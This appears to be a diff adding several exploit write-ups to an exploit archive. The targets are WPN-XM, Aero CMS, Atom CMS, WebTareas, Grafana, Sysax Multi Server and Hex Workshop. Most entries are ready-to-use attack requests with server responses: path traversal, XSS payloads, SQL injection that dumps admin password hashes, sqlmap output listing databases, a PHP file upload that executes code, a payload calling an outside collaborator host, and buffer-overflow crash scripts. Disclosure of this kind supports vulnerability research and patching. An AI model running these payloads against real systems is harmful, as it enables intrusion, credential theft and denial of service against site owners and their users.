# Discovery Date: 2022-02-13
# Vendor Homepage: http://wpn-xm.org/
# Software Link : https://github.com/WPN-XM/WPN-XM/
# Tested Version: 0.8.6
# Tested on: Windows 10 using XAMPP
# Vulnerability Type: Local File Inclusion (LFI) & directory traversal
(path traversal)
CVSS v3: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-829, CWE-22
Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows
unauthenticated directory traversal and Local File Inclusion through the
parameter in an /tools/webinterface/index.php?page=..\..\..\..\..\..\hello
(without php) GET request.
Proof of concept:
To detect: http://localhost/tools/webinterface/index.php?page=)
The parameter "page" can be modified and load a php file in the server.
Example, In C:\:hello.php with this content:
C:\>type hello.php
<?php
echo "HELLO FROM C:\\hello.php";
?>
To Get hello.php in c:\ :
http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello
Note: hello without ".php".
And you can see the PHP message into the browser at the start.
Response:
HELLO FROM C:\hello.php<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta charset="utf-8" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>WP?-XM Server Stack for Windows - 0.8.6</title>
<meta name="description" content="WP?-XM Server Stack for Windows -
Webinterface.">
<meta name="author" content="Jens-André Koch" />
<link rel="shortcut icon" href="favicon.ico" />
# Vulnerability Type: reflected Cross-Site Scripting (XSS)
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the
/tools/webinterface/index.php, in multiple parameters.
Proof of concept:
http://localhost/tools/webinterface/index.php?action=showtab%3Cscript%3Ealert(1);%3C/script%3E&page=config&tab=help
http://localhost/tools/webinterface/index.php?action=showtab&page=config%3Cscript%3Ealert(1);%3C/script%3E&tab=help
http://localhost/tools/webinterface/index.php?action=showtab&page=config&tab=help%3Cscript%3Ealert(1);%3C/script%3E

145
exploits/php/webapps/51083.txt Normal file
View file

@ -0,0 +1,145 @@
# Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS
# Software Link: https://github.com/MegaTKC/AeroCMS
# Version: 0.0.1
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Example SQL Injection
-----------------------------------------------------------------------------------------------------------------------
Param: search
-----------------------------------------------------------------------------------------------------------------------
Req sql ini detect
-----------------------------------------------------------------------------------------------------------------------
POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 21
search=245692'&submit=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 03:07:06 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3466
Connection: close
Content-Type: text/html; charset=UTF-8
[...]
Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 21
search=245692''&submit=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 03:07:10 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94216
[...]
-----------------------------------------------------------------------------------------------------------------------
Req exploiting sql ini get data admin
-----------------------------------------------------------------------------------------------------------------------
POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 113
search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 05:40:05 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101144
[...]
<a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a>
[...]
-----------------------------------------------------------------------------------------------------------------------
Other URL and params
-----------------------------------------------------------------------------------------------------------------------
/AeroCMS-master/admin/posts.php [post_title]
/AeroCMS-master/admin/posts.php [filename]
/AeroCMS-master/admin/profile.php [filename]
/AeroCMS-master/author_posts.php [author]
/AeroCMS-master/category.php [category]
/AeroCMS-master/post.php [p_id]
/AeroCMS-master/search.php [search]
/AeroCMS-master/admin/categories.php [cat_title]
/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]
/AeroCMS-master/admin/posts.php [post_content]
/AeroCMS-master/admin/posts.php [p_id]
/AeroCMS-master/admin/posts.php [post_category_id]
/AeroCMS-master/admin/posts.php [post_title]
/AeroCMS-master/admin/posts.php [reset]

74
exploits/php/webapps/51085.txt Normal file
View file

@ -0,0 +1,74 @@
# Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS
# Software Link: https://github.com/MegaTKC/AeroCMS
# Version: 0.0.1
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Example
-----------------------------------------------------------------------------------------------------------------------
Param: image content uploading image
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116
Content-Length: 1156
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post
Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_title"
mmmmmmmmmmmmmmmmm
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_category_id"
1
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_user"
admin
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_status"
draft
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="image"; filename="at8vapghhb.php"
Content-Type: text/plain
<?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?>
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_tags"
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_content"
<p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p>
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="create_post"
Publish Post
-----------------------------369779619541997471051134453116--
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com.

45
exploits/php/webapps/51086.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: Atom CMS v2.0 - SQL Injection (no auth)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS
# Software Link: https://github.com/thedigicraft/Atom.CMS
# Version: 2.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Example
-----------------------------------------------------------------------------------------------------------------------
Param: id
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /Atom.CMS-master/admin/index.php?page=users&id=(select*from(select(sleep(10)))a) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Atom.CMS-master/admin/index.php?page=users&id=1
Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
first=Alan2n&last=Quandt&email=alan%40alan.com&status=1&password=&passwordv=&submitted=1&id=1
--------------------------------------------------------------------------------------------------------------------- --
Response wait 10 sec
-----------------------------------------------------------------------------------------------------------------------
Other URL and params
-----------------------------------------------------------------------------------------------------------------------
/Atom.CMS-master/admin/index.php [email]
/Atom.CMS-master/admin/index.php [id]
/Atom.CMS-master/admin/index.php [slug]
/Atom.CMS-master/admin/index.php [status]
/Atom.CMS-master/admin/index.php [user]

118
exploits/php/webapps/51087.txt Normal file
View file

@ -0,0 +1,118 @@
# Exploit Title: WebTareas 2.4 - SQL Injection (Unauthorised)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Software Link: https://sourceforge.net/projects/webtareas/
# Version: 2.4
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Example
-----------------------------------------------------------------------------------------------------------------------
Param: webTareasSID in cookie
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/administration/admin.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout
Connection: close
Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z''
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 302 Found
Date: Sat, 15 Oct 2022 11:38:50 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: ../service_site/home.php?msg=permissiondenied
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/administration/admin.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout
Connection: close
Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z'
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 302 Found
Date: Sat, 15 Oct 2022 11:38:39 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: ../service_site/home.php?msg=permissiondenied
Content-Length: 355
Connection: close
Content-Type: text/html; charset=UTF-8
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'javax.naming.spi.ContinuaS' at line 1(1064)<br />
<b>Warning</b>: Unknown: Failed to write session data using user defined save handler. (session.save_path: E:\xampp_php7\tmp) in <b>Unknown</b> on line <b>0</b><br />
-----------------------------------------------------------------------------------------------------------------------
SQLMap:
-----------------------------------------------------------------------------------------------------------------------
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Cookie #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7431 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(7431=7431,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wBnB; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7004 FROM (SELECT(SLEEP(5)))BFRG)-- Oamh; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
[11:49:03] [INFO] testing MySQL
[11:49:03] [INFO] confirming MySQL
do you want to URL encode cookie values (implementation specific)? [Y/n] Y
[11:49:03] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.30, Apache 2.4.54
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[11:49:03] [INFO] fetching database names
[11:49:04] [INFO] starting 6 threads
[11:49:06] [INFO] retrieved: 'zxcv'
[11:49:06] [INFO] retrieved: 'information_schema'
[11:49:06] [INFO] retrieved: 'performance_schema'
[11:49:06] [INFO] retrieved: 'test'
[11:49:06] [INFO] retrieved: 'phpmyadmin'
[11:49:06] [INFO] retrieved: 'mysql'
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] zxcv
[11:49:06] [INFO] fetched data logged to text files under 'C:\Users\48720\AppData\Local\sqlmap\output\127.0.0.1'
[11:49:06] [WARNING] your sqlmap version is outdated
[*] ending @ 11:49:06 /2022-10-15/

61
exploits/php/webapps/51088.txt Normal file
View file

@ -0,0 +1,61 @@
# Exploit Title: WebTareas 2.4 - Reflected XSS (Unauthorised)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Software Link: https://sourceforge.net/projects/webtareas/
# Version: 2.4
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Proof Of Concept
-----------------------------------------------------------------------------------------------------------------------
Param: searchtype
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/general/search.php?searchtype=r4e3a%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dalert(1)%2f%2fvv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=&csrfToken=aa05732647773f33e57175a417789d26e8176474dfc87f4694c62af12c24799461b7c0&searchfor=zxcv&Save=Szukaj HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/webtareas/general/search.php?searchtype=simple
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 07:46:31 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11147
[...]
<form accept-charset="UNKNOWN" method="POST" action="../general/search.php?searchtype=r4e3a\"><input type=text autofocus onfocus=alert(1)//vv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=" name="searchForm" enctype="multipart/form-data" onsubmit="tinyMCE.triggerSave();return __default_checkformdata(this)">
[...]
-----------------------------------------------------------------------------------------------------------------------
Other vulnerable url and params:
-----------------------------------------------------------------------------------------------------------------------
/webtareas/administration/print_layout.php [doc_type]
/webtareas/general/login.php [logout]
/webtareas/general/login.php [session]
/webtareas/general/newnotifications.php [msg]
/webtareas/general/search.php [searchtype]
/webtareas/administration/print_layout.php [doc_type]

108
exploits/php/webapps/51089.txt Normal file
View file

@ -0,0 +1,108 @@
# Exploit Title: WebTareas 2.4 - RCE (Authorized)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Software Link: https://sourceforge.net/projects/webtareas/
# Version: 2.4
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Example in forum -> members forum -> chat
-----------------------------------------------------------------------------------------------------------------------
Param: chatPhotos0
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /webtareas/includes/chattab_serv.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------13392153614835728094189311126
Content-Length: 6852
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="action"
sendPhotos
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatTo"
2
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatType"
P
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatPhotos0"; filename="snupi.php"
Content-Type: image/png
PNG
[...]
<?php phpinfo();?>
[...]
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 11:27:41 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 661
Connection: close
Content-Type: application/json
{"content":"<div class=\"message\"><div class=\"message-left\"><img class=\"avatar\" src=\"..\/includes\/avatars\/f2.png?ver=1665796223\"><\/div><div class=\"message-right\"><div class=\"message-info\"><div class=\"message-username\">Administrator<\/div><div class=\"message-timestamp\">2022-10-15 13:27<\/div><\/div><div class=\"photo-box\"><img src=\"..\/files\/Messages\/7.php\" onclick=\"javascript:showFullscreen(this);\"><div class=\"photo-action\"><a href=\"..\/files\/Messages\/7.php\" download=\"snupi.php\"><img title=\"Zaoszcz\u0119dzi\u0107\" src=\"..\/themes\/camping\/btn_download.png\"><\/a><\/div><label>snupi.php<\/label><\/div><\/div><\/div>"}
-----------------------------------------------------------------------------------------------------------------------
See link: /files\/Messages\/7.php
-----------------------------------------------------------------------------------------------------------------------
Req:
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/files/Messages/7.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 11:28:16 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89945
[...]
<title>PHP 7.4.30 - phpinfo()</title>
[...]
<h1 class="p">PHP Version 7.4.30</h1>
</td></tr>
</table>
<table>
<tr><td class="e">System </td><td class="v">Windows NT DESKTOP-LE3LSIM 10.0 build 19044 (Windows 10) AMD64 </td></tr>
<tr><td class="e">Build Date </td><td class="v">Jun 7 2022 16:22:15 </td></tr>
<tr><td class="e">Compiler </td><td class="v">Visual C++ 2017
[...]

15
exploits/typescript/webapps/51073.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: Grafana <=6.2.4 - HTML Injection
# Date: 30-06-2019
# Exploit Author: SimranJeet Singh
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download/6.2.4
# Version: 6.2.4
# CVE : CVE-2019-13068
The uri "public/app/features/panel/panel_ctrl.ts" in Grafana before 6.2.5 allows HTML Injection in panel drilldown links (via the Title or url field)
Payload used - <img src="[image_URL]"><h1>Hello</h1>
Best Regards,
SimranJeet

27
exploits/windows/dos/51066.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2022-10-05
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download/sysaxserv_setup.msi
# Tested Version: 6.95
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code: Sysax_Multi_Server_6.95.py
# 2.- Open Sysax_Multi_Server_6.95.txt and copy content to clipboard
# 3.- Open "Sysax Multi Server"
# 4.- Manage Server Settings...
# 5.- Administrative Settings -> Configure...
# 6.- Clic "Enable web based administration and API access"
# 7.- Login -> admin
# 8.- Paste ClipBoard on "Password"
# 9.- Save
# 10.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 800
f = open ("Sysax_Multi_Server_6.95.txt", "w")
f.write(buffer)
f.close()

30
exploits/windows/dos/51080.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Hex Workshop v6.7 - Buffer overflow DoS
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-01-06
# Vendor Homepage: http://www.bpsoft.com, http://www.hexworkshop.com
# Software Link : http://www.bpsoft.com, http://www.hexworkshop.com
# Tested Version: v6.7
# Tested on: Windows 10
CVSS v3: 7.3
CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119
Hex Workshop v6.7 is vulnerable to denial of service via a command line
file arguments and control the Structured Exception Handler (SEH) records.
Proof of concept:
Open HWorks32.exe from command line with a large string in Arguments, more
than 268 chars:
File 'C:\Hex Workshop\HWorks32.exe'
Arguments
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag..."
0BADF00D [+] Examining SEH chain
0BADF00D SEH record (nseh field) at 0x0089e63c overwritten with
unicode pattern : 0x00390069 (offset 268), followed by 0 bytes of cyclic
data after the handler
The application crash.

33
exploits/windows/dos/51081.txt Normal file
View file

@ -0,0 +1,33 @@
